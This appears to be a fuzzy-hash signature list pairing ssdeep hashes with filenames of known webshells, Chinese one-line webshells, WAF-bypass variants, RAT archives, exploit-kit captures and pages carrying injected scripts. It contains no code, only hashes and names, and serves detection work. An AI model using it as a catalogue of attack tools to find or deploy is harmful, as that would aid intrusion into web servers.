+3:NA+4zdE44oK6:8dE96,"tiny.php"
+3:N8kiuNWYdp:mUN5,"readme.md"
+3:MPNFT0tQ8wVN3AJS43sGccxsE6:MJRN3Ac43sL2sE6,"remote-shell-includer.php"
+3:MK7VEEmo9dJ2Qpg2Zt4/E9NKq2ZnBeen:MK7VEER9j2QOGEErx2Znrn,"upload_5y9.php"
+3:MEumUGaGfF54E4luwTeshn:M+UGRz4jdesh,"update_l8f.php"
+3:lWH7P4Q7F:Q74QB,"simple-assert-shell.php"
+3:lUovUZYARSjzM0M1DzufHsytg8RARSj2JF6GNeDzufHsytgkb:lle+zMbisyty+kF6GNGisytb,"3.php"
+3:lUovC2ARSjzMhBJC4JMYevF6GNeDzuej6OJBGb:llG+zMXXMzvF6GNGbjbW,"2.php"
+3:lUovC2ARSj+Cx4LCm24C1iJF6GNeDzuej6ib:llG++C6CmfC+F6GNGbjv,"4.php.001"
+3:LsHn:LsH,"_input_3_css.txt"
+3:KxAskBNyxUWYUhqvvQjNxP0WXAQXACURv1X1ctfsyXqi2NQCfj1xfTyd0TBFgVL:iRuMxg24EQQQCiWJY7nryeXgVL,"base.asp"
+3:kNFUqWAjONF5zBejOxEwvWXEWNAhx5K2lD4vFMFGe1VVfErY:kEkONF5z0jOxGUKAhx5KmD4vJ4uY,"list.gif.php"
+3:K+FcRT3:K6cd,"合成图片马命令.txt"
+3:kbNHPMzxvRCoen:kbNSxvkrn,"php-xor.php.md"
+3:K2iFCvd1FhFWWu3DNEMRXRGEvyJM/8FFotQo+FvBFv:7vd1oXNEQyC/combBV,"ChangeLog"
+3:JM9Vy8SPFjOaT3LHise7BNXMLHisew9/jUb:CXy88FyaT3iCX9gb,"id1.txt"
+3:JEiWVFcABO+kNABFR97pKX6xBKLELVCVl2+NM:JTWvckcSBp7p7PLS2+i,"DISCLAIMER.txt"
+3:jAsK8xwwACMxTGRw+MKrMmIO0LKU3MeIBLvGu3LR2jud+Kk3XvRw+MKrMmIO0LKj:jK81MxTGRtMKRIfBMvGu2iGvRtMKRIfQ,"robots.php"
+3:j7LUA5MOqjv8m:/LUAS3om,"litteryixx.ASP"
+3:j11uXL9Aq1/G4dq4iG9VBKKth3cNcXFj2EYfWH1A6md9AdrRLSvn:x4X1bdqKeKtxcIt7IidVLc,"一个过安全狗的pHp一句话.php"
+3:IU2igx+w4Mhovn:IXig5hovn,"simple-sysfunc-injection-v1-GET.php"
+3:IsJ0/:T+,"tiny-get-webshell.php"
+3:iR6/oKu1W2rYmQRSuKtv:iR6/W18mESuE,"requirements.txt"
+3:ILirJgx+QQovn:2yJgxQovn,"simple-sysfunc-injection-v2-GET.php"
+3:IL1q2dkej7Qovn:21Ndkg7Qovn,"simple-sysfunc-injection-v2-POST.php"
+3:iIN5yFKUdIHwb3P/PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPvd42:iV6uj9RRnrhyIbetKr,"Readme.md"
+3:IGigx+loJbn:IGigzJb,"simple-sysfunc-injection-v3-GET.php"
+3:iASFu2FIPqfvn:7SFpIifv,"bind_netcat.sh"
+3:i6OnkVSv/AkQV5ZGONzhWDRVcWUnDSt4iSv4wv/v:i6uAkuZZMVkStS/v,"lost.php.shell.creator3.php"
+3:I12f21jaMhovn:I1/dHhovn,"simple-sysfunc-injection-v1-POST.php"
+3:I12/1j9ecn:I1ed9P,"simple-sysfunc-injection-v3-POST.php"
+3:huK0d6LR7mx6BsOwUTRFsNWKPQLMqFNyjvLRd6FAFd3vVHQF8cZ0ITylvLFn:Ju6/wsRJEQLM+wSCvVwSDImTFn,"go"
+3:hTEKGuNVoGN4MiQ:FEKGCyG3F,"国外某论坛不含Get,Post的pHp一句话.php"
+3:hTEd8xpH60V/1Ix5BQ0VM/1v9G87MTvvZancWH7TW5BFLvKVQRYvuj/XaATE2x5b:FE2xpas/ax56s4k1TZaH/W5u6PjvLjxx,"php一句话02.txt"
+3:hTEbEWATR7cN1kM8L7yHX3aINM0XOwHQXL8viN38Q2Mv2pgzh9zqrEvaEKw8wpoP:FEgW2A6M8LwnDzvTm/F9zqQaEpGK2j3n,"一句话2015-06-10-03.php"
+3:hOqx1470GXGEI:OrXGh,"0zUemgkP"
+3:HHJ6QMQBALD2HJsLMaQWMwsYSeLTIM8gJ/oAIaGM/RNPJEJXLFEwJMLLP2QVfVka:HHJ6QnA/2HPbnYSexjRoyWJbFEwCLb26,"odd.php"
+3:hGYVVskeBV2nJXTCJa0NS:0ja0U,"m7lrv01.php"
+3:hGYK9:o,"x.gif"
+3:hGYbqniJS43sGccxpkVwPQVn:xc43sL2KS6,"remote-shell-downloader.php"
+3:gzIT1cNc9rdVHd8koQ:gzuWc9rt8koQ,"php_assert.php"
+3:gyXA4fDvFJFkHT1cN3CjlcyvNHLGgNeyl6n:g+TTmCyjG8NrNl6,"php_create_function.php"
+3:/GWzRstXs+vn:RR8X9n,"China-Chopper-webshell.asp"
+3:/GWzR/hAb:RR/c,"01-plain.asp"
+3:gVNaBY4eyRCeEzciaBoZ9PBgVSPIe6n:gVN6keEQiaBon5gVSPI5,"bypass-waf-2015-06-16-02.php"
+3:g/O9HVHLJfnkVSv/AkQV5ZGONzhWDRVcWUnDSt4iSv4wvPGYLn:xHVAkuZZMVkStSPGYL,"lost.php.shell.creator1.php"
+3:gmX6gOGCD/CWFgUBePXgI5A1yQWlyPKgBoI:gg6CcgNFZyPKBI,"404.php"
+3:ghBcNc9rdVHh6xL4faLn:gUc9rx6xMS,"一句话2015-06-10-01.php"
+3:ghBcNc9rdVHh6xL4fab:gUc9rx6xMI,"一句话.php"
+3:gFHoT7MJgSc/lRRdTTNMwpA0A+WBaaL:gFV+Sczhm0A+QL,"牛X的pHp一句话.php"
+3:gEzMejWWSg4eMz4eeen:gEzfjWWSPLn,"s2.php"
+3:gBAjxzXOQ:gBAjxzh,"ice.php"
+3:FO9+KLBbn:FO9+en,"teste1.php.2"
+3:eyzAfao+jAv:eysfnci,"README.md"
+3:EHR6jJAAEByN7Jhfy/ea98BvgWXCkKVWIU/aAvqqqAvXHxkyQAvQ4DK+aYGYuKV1:Ex9h4gIgHkZdZ7/HSyVIb/XYxuErW8z,"20160206-000828-VrSs3GjuZ1YAAG8HfGQAAAAY-file-AAI2Ht.1454681309_1"
+3:EcUGQQvfFbMAxlERMuMa6n:EzGDvRBxlE+a6n,"micro.php"
+3:E1Ix7AXOn:Eax7AXO,"China-Chopper-webshell.php"
+3:e0yTcZt2XtapbMCVcfqryls/gfv+FEFvn:eJotetapgl2gX5vn,"README.md"
+3:d+RdMnKKzTW5BkYcmOKJYCGLdFFAaeSXKkTUImSVtXNiMwaL:It4W5FODCcdF6ab6aUCVtdvw6,"getcode.php"
+3:CvVJkW9IA5eRtBGAYJ+fvz:G7z5e/1k+fL,"ice.aspx"
+3:CvAGWzRmXHt:HJRk,"ice.asp"
+3:Cun3xARQgv9Vc87EWNAm0A9VcV3AkvQNYesI4bn:Fn3GDvM8AKADAMV3bgYL7bn,"story.gif"
+3:cbU4FKEISNM4Ndv4WfFL6a:cbU1+Me4qdv,"cmd.txt"
+3:cb8VviXY0jrIPKaKc/p6GY+2gy+Kw2OTzs8ZKafPLkzg9xbY1EI0K4:cb8VviBjEyaKcrjWON5rkzgTEaF,"lost.php"
+3:C0eC:9,"teste.php"
+3:BlF+t2EYfWH1A6md9cEjFe:Bf+t7I+ke,"array_map.php"
+3:BIU0M/PDXdDzDVMcQrasLMQrauwrOn:+PSVScGzMGUO,"loadx.jpg.2"
+3:biApicmc7Qs611fwM2C3yDfaDCfT27lgOW5yuvH5teAL:jNJ7QDfwMn7WOlsLeQ,"w03.asp"
+3:bEovZaO/PQXO30KXIVJt4asLyfax4On:NsoQXO30MIAyKf,"loadx.jpg"
+3:bEovZaO/PQXO30KXIVJjPzVmE9Qn:NsoQXO30MIfPJz9Q,"loady.jpg.1"
+3:b1zbKjn:Nben,"密码.txt"
+3:b:b,"README.md"
+3:AxLW+p/uH+0FvNW5YE0ko:Ab/urNV,".htaccess"
+3:aEwJkW9IA5eRtLYAXkHYvD:aEm7z5e/ZXkHYb,"China-Chopper-webshell.aspx"
+3:aEwJkTTJBEmh8kLZAe2FWiFhjRtApAVN2IwEDvev:aEmsJymGcZArd/A2N26DWv,"w01.asp"
+3:A6JxQU8R/hFwcvATE5qhv8czhF1LjI7nARFu1Im:Ax5R/TTv2l5lhFRMnV,"bypass-waf.asp"
+393216:iq3YRV4yyvc90EjzXsmninjnSji11KtFOiH91Jrr27GLM75EgKPnM2efMXL+zSCc:icYRV4yQc9JXGjSe1Gsitf2aw9EHnXDP,"XtremeRAT_March2009.zip"
+393216:aUKLc2k4gXnlf1PT9yp4w+QuJM5j1SpOkb2/hfO27lrGKuz3ik2hQJKQukF4B:nIcNznV1PZgqMkb2/hfO4qKuz3ikAAKv,"PowerLoader.zip"
+393216:aEOAL7PBm9CYE1wzLkjQf8fwdN0usgiwksIHbSDhbPSjunqhB67P+:aEV75kCd1wzL6a8CPwwQ7SDhEumBi+,"ExploitKit.RIG.zip"
+393216:6rGzQvxdnEOSvGon7f527yj/yuvCGR3O3v:WGMvx9EpvGAdZjxv53O3v,"Artemis.zip"
+384:ZwKTBm7oTnQ/FSEr4QTmQTpbbJfPMnxHGRR4yT+:ZwytTnQgEVT/TpbbJfPMnxmReyi,"sysdata.php"
+384:zT6DbfJC5oyrHWx0UDOos3xMPaljaIHyCLKXUZ2+kH17wEmMvFzt9E:zTotiWyUKos3xMP2+IS0KXu2+n9,"404.jsp"
+384:ZT1afAi8ixGnA5jfGskvObhJiuJhYE74zxw4f+4sOXEPlA8rTEqXwQT0GRc/jAOr:Z6D8Zi7GfObhJVJhLM9z+4smlqAkX2/H,"ok.txt.2"
+384:ZLtDR5a6TcU0x7ukrCUM4Yuq09zIEaWTOH5YWrrJMbmtAnq3gqRcqtx7VZ5Q7alr:TR/TcUiu6LM4rqky7H5prr2mi0hcQBDz,"2016-06-25-Rig-EK-flash-exploit-after-southcoastdrones.com.au.swf"
+384:ZKgJmPf4F0r9faAU4pqSsOn31n3QXsE9a:LmPf4Fg9faAMOScEA,"JspWebshell-v1.2.jsp"
+384:ZKcPAZELwZrVfZaTegByRoAX4r9Rqd6kBuat11z4X2wjQXgmXlygmXLSqT:9ByRiq6QM,"mysql.txt"
+384:ZKcPAZELwZrVfZaTegByRoAX4r9Rqd6kBuat11z4X2wjQXgmXlygmXLSq0ISf:9ByRiq6Qr,"mysql.txt"
+384:zHxgbLEfGUkZPX20/ef60R1HKtUNfyIaElTfcstw:zHmZLZO02fpHKufGElTfcd,"2016-07-19-page-from-gymvibe.net-with-injected-EITest-script.txt"
+384:Zh6K57qAMkY0ddr8iQgNhjRuwHq8GOkRFscJyCLKXo5K0KaKzKjFbOW+I3agvYQy:C78FVRuwHveF/Q0KXo+6rEK3m,"苦咖啡专用.jsp"
+384:zfJaVZxi2VYFKuD4hIfp/IRPM9kKOxK9W9HzUjfFT3Ss+e1KHi1O:sZx8ecaQryKkdzUjlBwC1O,"2016-05-25-EITest-flash-redirect-from-bexyve.tk.swf"
+384:z3qwOtBEf6giPSmNDvpZVRaJS7RTlIMn85:Lq7pgmSmhvzLaERTmM85,"2016-03-28-page-from-jacobwirth.com-with-injected-pseudo-Darkleech-script.txt"
+384:+Z38J8i5WuL6vg5t+0lmhCjvjnZASTbB3tVwUa3iwgMmTqp+VkrR2H9jXcV4yZne:43ihW/Q+cnlbd04yGbQCzWc,"1----环境检测功能非常不错.aspx"
+384:z1U6hgozbnnjlDVlECWCKCDK5CGBMDalC7GqL:z1FhgW7nj/apFyOZBMDalC7,"dor.txt"
+384:YUTigWw6hJ3tK1RYolNnu4jYML+MofjwfTlpXspXrMzyykUPkF/nDIE/qWeU9q:7igWw6hJ3tPigTSRofjwrlpXslrMuyka,"2016-07-29-Magnitude-EK-more-HTML-second-run.txt"
+384:YSPLmnv7+liNy+0rFtxqQLj1Ax8qn5+OkeFZQNY3kw4Wsg0zK:NjmnTz50htxqWj1K8qn5JFeMRwK,"reDuhClient.zip"
+384:yRv+6RtBrRgVFRMEZPoeiOM3JySGQE4EKExE4/yH73Lgvuo:Py3dgVFRMEZgeiOM32/I3Lgvb,"2016-07-13-page-from-thewinegroup.com-with-injected-script-first-run.txt"
+384:yHwgFhlpNbfOZuly+zkd1GcJZCIYUfuUsBJu1QybTzyO:yQgRbuuBujNYq9D,"2016-05-17-Rig-EK-flash-exploit.swf"
+384:yg+KWyYdv6NiNjaogNSNazKC7yMjjjkvjSX:yYWyYdv64wovC17CS,"bt.php.146"
+384:Y4E6Dyh7L7a+JME6mNUTkVB0fDSsvT9uRAvdpNyqrHNyqrHNyquHNyqMHFypmHFk:a6Dyh7L7a+JME62V922VWQ9v,"Backdoor.ASP.Ace.ac.asp"
+384:Y4a1U4MA0RIm4u26suKtX6gRftFXS0fmftgpVoffPBmR9KN:Yx1U4MA0R+Z6g/CM9aN,"kan.log"
+384:y1zI6viefogbR+rqqSnOf2/Oriwourz9n/Jpd:yK6vjlR+NSnOf2mrixuVLd,"con2.aspx"
+384:y1zI6viefogbR+rqqSLOf2/Oriwourz9n/Jpd:yK6vjlR+NSLOf2mrixuVLd,"871ab8ff4257c4cf7af487a5f3597647.aspx"
+384:xXbH654tBrRgVFRMEZPoeie3FI86PEBE5E6Er/aAa1ZGtEuOu:ZY43dgVFRMEZgeie3FIG/m1ZGtEA,"2016-07-12-page-from-thewinegroup.com-with-injected-script.txt"
+384:xXbH654tBrRgVFRMEZPoeib3FI84PEBE5E6Er/aAa1ZGtEuOu:ZY43dgVFRMEZgeib3FIi/m1ZGtEA,"2016-07-13-page-from-thewinegroup.com-with-injected-script-second-run.txt"
+384:XTVCIgqx7zk1JJwB6CgGvBs3+p0qMf6e4NSsb3xL:D9x2wB6CgGpDp99e4NSYR,"2017-03-07-Rig-EK-flash-exploit.swf"
+384:xsKA78aXaMtsXcqANuIZi++nuwtFl7HLAeQ+6U+FA9aYPl3q4uqLkp:xAAtX+v+nJFl7HLAeV6VFaduGkp,"20160202-090458-Vq-kmmjuZ1YAAGADKyAAAAAF-file-MkyqDN.1454367900_1"
+384:XqPpGoxxEob1Ku30oQAwLhb+eq12xH1WVbUoYmTruUNQ1cG/XAwWLkYcWl:EGoxxXb1KuBQjVkDTruwinohl,"Backdoor.ASP.Tuolog.a-sqlserver数据管理v0.2.asp"
+384:xpitht++z/ZJcj0ywjvvzhNrPDhPjd0Nogi6:xpitrz7cSzjDhPslJ,"reDuhServers.zip"
+384:XoIRevLHbfCKEPCjSAeyoCfOA45mpltoBMz+bYVx07qUC7Ej6LH3BpTCUW633Ci:YbjHbfCKEPCjSAROkbk++bIx9d73LH3D,"Sst_Sheller_by_MrAmir-Masoud.php.txt"
+384:xMOwOAT6R0qexXBIwtwNTrIoCVPCeaAKaoAyBD8hwcH5bqHiW/XmE8ta6H8bUZZ6:iyqLoASX6RQQ3em9yeMPn,"2016-07-25-page-from-depressivedisorder.xyz-with-injected-script.txt"
+384:XLSZRcHT19ner2HOsylPqdXvfjACU9maDsxgkv/2tt:7SZROZg+clPqFf0WaDsxXmj,"spam0202020292333.php"
+384:XLcn0PP958VI5bYR8+ulgdtn3lty4sW23Fq:XL+aNYa+u+dHBB,"2016-06-02-cbat.or.kr-MzVuOo.html.txt"
+384:XLcn0PP958VI5bOR8+ulgdtn3ltyKsW23Fq:XL+aNOa+u+dVBB,"2016-06-02-98.126.83.188-port-82-ZnUaLm.html.txt"
+384:XktEaPWhB7pLbl0V8dd28GeCheU75v3BNyiHf+:XAEaP07p3lVT28G9VFZf+,"ACat.jar"
+384:xKgVmPf4F0r9faAU4pqSsOn31n3QXsEsk:fmPf4Fg9faAMOScE9,"JspWebshell_1.2.php"
+384:xKgVmPf4F0r9faAU4pqSsOn31n3QXsEsfISf:fmPf4Fg9faAMOScE+,"JspWebshell_1.2.txt"
+384:xiwr2BBR3Uvi2Qs0HgIlHTPeq2KTcpP/v+X6wm/t3Vb4Vt3cdeueBUn3zyns9ud:8+2BnoQJHt7up+X6j1J4Vp0eueszGui,"pas.php"
+384:xhvqm9Q+vNJJV1se7CBb4tBM4IL26NaJ1Q9+I7rRM8jd0Z1dF/2cOKTwRqp+C9SK:x9JJX5kf26wJ1GBmGI6qpnoQQjmqg,"2016-01-17-page-from-compromised site-with-malicious-script.txt"
+384:XFyICoJnu+QgAFgqvHEdLUcXEPA4asEJm:V7DLqv6UyEP5XEU,"2016-03-04-ksvi.co.kr-index.html.txt"
+384:xCBhIXKm8WO4EWKvovUWcmWt6+JPdRXjckzc0VVegjbq:SBrWOEOY+JroY/q,"cp.php"
+384:XBn4PVhZTYYN1u1DeoOi7ho/F6SxOQ5h/mN8zGQi:XubT52ePi7hod6SxOMh/mN35,"web.root"
+384:xbAeDfYEXAvk4+1xCt95sdoHqVlk6Ht5EdC4APOJ/q:xbAREwvk4QxCzmdhPkCOlkOo,"z.txt"
+384:X8JCs6JytNwRx76R/ryPYVFDKxQxboDenNZTo3vdeujNEAcoPe7JzHX8xbGUt7JM:X8JCry3dRjyysNEAsX/,"predator.php.php.txt"
+384:x1y6UYLopoCkEtUEL8t8F8Q4w8GTVwTSoeZ7/q7:x1XUY8CCkDy0s3LnTVwTSoeZA,"dd.gif.43"
+384:X1bnwBvu26e/dVY7IH65uLKMWiNWoNvNsMZiPcf6bpNYYZSbYhHKS3e55u4zFwwH:eBv3B7+e71qkjo3YQg/5e2,"2016-06-30-page-from-alphamedical02.fr-with-injected-script-pointing-to-Neutrino-EK.txt"
+384:wzC1JeWf95zDUN21UdmusEKadU6WfTXhu+9:L1JeG5vUNTdtS6IT,"mailerz.php"
+384:wQLYmZlTEQWM9pFcuqFLqOfGIL0jOjFQyw36THfJFqRJohO:weTE1ElqdfGs0jOjmywcRIwO,"Backdoor.ASP.Ace.ap.asp"
+384:WPxpN8lIRzPwvQLEZjbDt8+r0VMiNtePQvz/X7OksQIhyTyqwBBP3qoZHi:CxpPRzP3ufi+MPDePQvz/Xsg4BP3qoZC,"Backdoor.ASP.Ace.bf-ASP探针V1.60.asp"
+384:WLLA0/e4YuQrsmEWLjhSe3Hnfl41L5bfa:Wo0245QrsIr,"2016-07-28-page-from-orthopet.net-with-injected-script-second-run.txt"
+384:WJGXKB7iBMsjJ8oUPS1Hej6P3R/SfxaMyUbbBvPeWNoOHWtfciBiHUcjJ:JXKB7iBMsjJ8oUPS1Hej6PR/SfxaMyUJ,"asp目录写权限检测.ccc"
+384:wIto11DJlQH1LRbUKOCWHkVUWb3a4IV7Ir9jxg09:wIA1/QPUlCW9cKUrZf9,"2016-05-19-EITest-gate-flash-redirect-both-times.swf"
+384:wHcLxXFXPPeAcsPHE10mcVcGXw3y1G+nDhP:scLtFXT4FbGw3y1BnDhP,"Hacker-OnuR-Shell.php"
+384:wfHKEN8g+XFIf83hP/17sgC3QgkBiE0WD:1EN8g+1If834gRZ0WD,"JspWebshell 1.2.txt"
+384:WfCRmRwlngrsT8p4reeeeeSBvIeeeeeeePQWeeeeeeeBeeeee8TMeeeeeeeeeBer:JFX6pG,"Heykir-Shell.php"
+384:w6Jb1p6czKrcKYmBq1ICj0b78mum1jAbyAKbfM+dCph:wQzhzKrcb1ICj0b7tBAV,"AlpHaNiX_IRC_Bot_by_AlpHaNiX.v1.5.pl.txt"
+384:vzWWLrHt6vJ8jpSjsIEVc7TCL6BuJcvjsnlej5fqP88H+Ic6:vzWQt675jIt,"successfully.php.001"
+384:+VW0WClWig8wpzSWJF7ZvovclGnax3wqEBSdMhDmjNGytYcA:P8FqEBSRVA,"asl.txt"
+384:vuPEEu5HZQaI85/OmdgENhoPrwIoPrwMoPrwMoIrwEoPrwEo9rwFoFrwAo1owWoN:vqEEim8RJbRs5GnFXcJQvM/aY8vV95yU,"mal-index33.html"
+384:vQyr1VYmauLp8ILB65SjHAS7/UsKh4h1bMLzGm/ojPIQp3izRmbeW9zG7AYBA:vQM1LauGaB65SjgS7/7Km12zGdIoyw9h,"54677d9a0728fa68f8b4d46878ece11b_php.txt"
+384:vngIW82QI6ykNlP29Rfwrec6DXionuhGr2k6qAjg67dkKbD:/i6yoyMejDOM6qAE6SKX,"Wso2_1.rar.001.001"
+384:vMI4YefQfPVQ0WYmfJ0GXRdP/pSilT2qF/3wNYnFg:L4YeCtQzhznph92qF/AZ,"2015-006-Word.zip"
+384:vmdTkrTAI2wyKn0Urjb/6Mp0u5zfhVvc/VD/zZozBDuEjbfz:v8krTVye5rjb/6exLgVnZsXb,"MySQL.Web.Shell-v1.6.php"
+384:VLLA0/e4HuQrsmEWLj6bJ3Hnfl41L5Vca:Vo024OQrsVg,"2016-07-28-page-from-orthopet.net-with-injected-script-first-run.txt"
+384:vL6Dyh7L7a1rqEymoUTkVB0fDSsvT9uRAvppbLHbrHbuHbMHbmHbPjbKHRMHbDHZ:T6Dyh7L7a1rqEyR6v77Ui4QIFjj,"Backdoor.ASP.Ace.db-站长助手6增强版.asp"
+384:vIiH2ER39I1Vv+kIPEWWjYc+CmJNHKblvcDSRRjqSA93DuxuXvWxUoH:vIy2ER3CL+khWUYcsJtMcDiuSA93Dux/,"foo3.php"
+384:vFHsOKjG86Q1dx9A0ks9sQc5Pi49Ydhcgu05Flo678BfRICpJyJi+ktrnVgd5kDe:92E2dnkhiLdhcn054zR7iVOhWclZp0z,"filesman3.php"
+384:uvksoFa4YVFY+YgYiYVYTYJMYFG1YwzhYYY5vYf9WYfkMm/RHfkC0U//YR4rpYKQ:uv8Fa4EF/rDWwmMZ7zh7D9WLbpHfk4LA,"shel.txt"
+384:UsaSwsF3RtJhwhxY5janx0Rig5xJx52FRsBU0ipgFHF3xR:44snx0Rig5x752EBUxpc5,"b374k_by_Cyb3R_ShubhaM.v1.php.txt"
+384:URcRXTRvMRf/eXgepzFtwI8s0XXdyD2d30c1Ho/GlzjS3A8xcISf:URc/vIf/9eLksO591HoBA8x8,"mysql_tool.txt.001"
+384:URcRXTRvMRf/eXgepzFtwI8s0XXdyD2d30c1Ho/GlzjS3A8xb:URc/vIf/9eLksO591HoBA8xb,"mysql_tool.txt"
+384:UpYayNtvqz03Ma7Bpg85TIqGBjyAJEvMRS8EsGR1VI7HoQVXVcju8ZrQZXBLBuIQ:Uhk1qz0csBpg2E3yiEvMtEsG9I7Hnncz,"20160202-134614-VrAmhmjuZ1YAAC1ZdPYAAAAi-file-HM7WuL.1454384774_1"
+384:ulWsHKc3JLOxOnqiX5PwB2zqraEmvdyNittFKb+TDV8A:ulWsHKcBOcJ1GxrNmvdQ+/Kqh,"load.txt??"
+384:Ul3FnOakFXH0WhOO9UrrXNwMU2Nu0r3B60CeamroiG:UHnoFkiOeEM0CeRro7,"NTDaddy.v1.9.asp.txt"
+384:UkVy62jqiOposWyjhPYPQ874wPiTj5kOPeZ71qn:UkVX2j/OCsWMhwoYLKTj5kOPeZS,"main.css.1"
+384:UkTCFy62jqiOposWyjhPYPQ874wPiTj51X+eZ71qn:UkTCFX2j/OCsWMhwoYLKTj51X+eZS,"main.css???POWER-OFF?????"
+384:Ukk5y62jqiOposWyjhPYPQ874wPiTj5kOPeZ71qn:Ukk5X2j/OCsWMhwoYLKTj5kOPeZS,"main.css.3"
+384:Ukbu62UqiOposWyjhPYPQ874wPiTj5dnLeZ71qn:Ukbj2U/OCsWMhwoYLKTj5dnLeZS,"color-rtl.css.1"
+384:Ug6aqiOposWyjhPYPQ874wPiTj5uJdgSC6LeZ71qn:Uha/OCsWMhwoYLKTj5KeUeZS,"options.inc.2"
+384:UEfyEab5OFW5OdIAOExG3Ij2wH9657T03IABcjNBXY6UyPgMKkPWiAQCPNZsoD//:UEFamdmEzWHjQM+QCHDX,"2016-05-25-Rig-EK-landing-page-second-run.txt"
+384:UcvSzWM5sjeXKBDKZe0GUctK9+kn9VPSkDHHHgmdF2Bn9:Ucvfkn1HHHgmdF2Bn9,"Evilspy-v2.0.aspx"
+384:U2fftZftjl+J7ED6Febm/StmROVffPlIIlS1:nXftjH6Fey/yg1,"login.txt"
+384:U2fftZftjl+J7ED6Febm/StmROVffPlIIlJB:nXftjH6Fey/y3B,"login.php"
+384:u0tNYkTTMAuMA0HEmNy4jmDvSWMTGhN/+pgPUU7f93SHzC2565:f1TTPuMvHbZPWtspgbQzCay,"2017-02-28-Rig-EK-flash-exploit.swf"
+384:TT6DbfJC5oyrHWx0UDOos3xMPaljaSHyCLKXUZ2ikH17wMmMvFzt98:TTotiWyUKos3xMP2+SS0KXu2i/l,"suiyue.jsp"
+384:tmSofkynvira47t+z5HeCNkWpZiy58qd+MOvDhCjD0+y5C23w5:t0HvrB5HeHWDDIvDIs+y5C23w5,"cmdsql.aspx"
+384:tMdMhSUy2ZfT0/eU/pG4FY8rn/RZukZzzaIgMeMiif1:7Py2p02Uakvg2JN,"2016-07-26-page-from-calentejo.com-with-injected-script-second-run.txt"
+384:tjqGR3kuO1BgwxhQgSBc3UBxUJbGcsQPhGqfPZkgxQbijDTBA:tjqGJkuuTTB34cGTQ5vkgxiijHBA,"92041420967f2030cac43fda3af9a3dd_php.txt.001.001.001.001.001.001.001.001"
+384:TD08vDlWyMAjjqUS211uKifqYsKXlgFdlUS1wjGxdjc:TD08xWLWjq6QKwqYsM0lUkwKc,"webadmin.rar.001.001"
+384:T8Ldp8aAaK++6IGB8n5TlZrlr7uXQi6QrXrox3YxA4KR:TOuuXQJz,"bt.php.33"
+384:t38nOa1QiAXu0rp6ZuhxuO9U7ZYlweKQEUBKUZLTJ0C+amroiM:unereUEZOL0C+RroJ,"elmaliseker_02_by_forever5pi.asp.txt"
+384:t2qy6y+ZowWvDl+AcnMyn/9VarmhAOTaQMhhKMRksXQPwXcuQ4O:MP+ib5CnlEAwhKlsXNc7,"perl.txt"
+384:T0QehBCrL12S+HN3oDRr4flM4L+eMYjXMveOSFcGuV7AkVlhwT:T03Jt4DsRLZ3jXueOscGuV7rlKT,"20160201-051333-Vq5c3WjuZ1YAAG6PskIAAAAE-file-45a3Sj.1454267614_1"
+384:SX6LB2hHLZCMi/pnfGo21RAeaejCeeL7C+EFejntwS:SqLULZCMi/ld9eaejCeeLWejnZ,"2017-02-23-page-from-sunlab.org-with-injected-EITest-script.txt"
+384:SwMSOPVF6yPPZdgdDVduSoTUg1lBhn2Oj4:S4Od/eFzuSoTUg1fhn2n,"cgi.pl"
+384:SwMfOPVmbKPEZIMtHDKbIeU1zXKg0jfLbEGX:SFOdQdtjCIeU1zXKgYfLbJ,"telnet.cgi.pl"
+384:SwMfOPV8e/PPZdeikDRduSoNUg1lBhn29jU:SFOdFsi03uSoNUg1fhn2i,"Cgi_Telnet_by_Rohitab_Batra.v1.pl.txt"
+384:SwMfOPV8e/PPZde8DRduSoNUg1lBhn29jU:SFOdFss3uSoNUg1fhn2i,"cgitelnet.pl"
+384:SwMfOPV0e/PPZde8DRduSoNUg1aBhn29jU:SFOdtss3uSoNUg1shn2i,"cgi.txt"
+384:SwMfOPV0e/PPZde8DRduSoNUg1aBhn29jd:SFOdtss3uSoNUg1shn2X,"cgi.php"
+384:STVwqzGNEjQw5V6iH/MI7Fu1bcj8hLsLWkqKEW:SiqoE84R7FAKZ,"2016-06-30-page-from-cliniqueh.dk-with-injected-EITest-script.txt"
+384:srhc48ufYV+adCvsbpHgO+meM0JYwqJmTgrXkk7hTliFPzMoKWR6I2OPlOAtGbWf:mJAV+adCvfYe/JFqs8X5eO1WR67Ohtgw,"bb6.php"
+384:sR9RquobsQduNHo5YK49hgpTbwYv0gFaDgZoU6QLs6I8+nE34:s/RToVduNo5YK49hgpTcPgMD9U6n6+O4,"6.png"
+384:Spujrct9bUPP8YvpEmkY6n2FJSgvDT7rnGb+mUpKIjgxC4M:PU1mgY6nSSE37rnGZUEVM,"sinan.php"
+384:SN67RxYITPDg8UMBlUAL7Xwbjrjox3KUD:dYIQFMvNrnD,"phpspy_2005_lite.php"
+384:SmkWCFGJ820xWN3GsXz2oxBAMtCOzFZ/kGnwvp0dRATs4rQp22Xlz:SDWGmv0FsXpP9o0d2s4rQcS,"2016-04-06-page-from-latchamgallery.ca-with-injected-Darkleech-script.txt"
+384:SjqGR3kuO1BgwxhQgSBc3UBxUJbGcsQPhGqfPZkgxQbijDTBW:SjqGJkuuTTB34cGTQ5vkgxiijHBW,"92041420967f2030cac43fda3af9a3dd_php.txt.orig.001.001.001.001.001.001.001.001"
+384:SIg5vUTtJkVwM56leuXCGZGPqguDClyQetstsMbxojdK6GCcBHPZqnWOD8ChUvRi:Sdb6AFSsG6/Si4FAUp5vh,"2016-08-05-page-from-findautosalvageyards.com-with-injected-EITest-script.txt"
+384:ShN6Rjk9hR7vuyvqdcYRtLWlFr8LDCkO/6VR4v5SRvieQWiptreICBWpn2MBW1zs:SPy8hR7vHFr8LuzdH2Tszbue,"2016-07-21-page-from-opencv.org-with-injected-script-second-run.txt"
+384:ShN6Rjk9hR7vu7vqdcYRtLWlFr8LDCkO/6VR4v5SRvieQWiptreICBWpn2MBW1zs:SPy8hR7vwFr8LuzdH2Tszbue,"2016-07-21-page-from-opencv.org-with-injected-script-first-run.txt"
+384:SfOHQ39/YpTAIjYBsUU4TTLKr9V1p/34Gsp4U:/HQt/YpTPkmoPKpV1p/34Gsp4U,"2017-03-02-Nebula-EK-landing-page-2-of-2.txt"
+384:Sfb0OEpsEhBxfIzZiQx1ZoTkCcG46AyRwWCMb:SzFEpTFIxYwCf46ADWCMb,"files.war"
+384:Sajintqs20P21MjMQs+HZyHGxofBNOgQL7Y/2XN7/mPBRBZ2YCGagka:7jotqgPTMYZAo+x1rd1,"PHPSPY-v1.5.php"
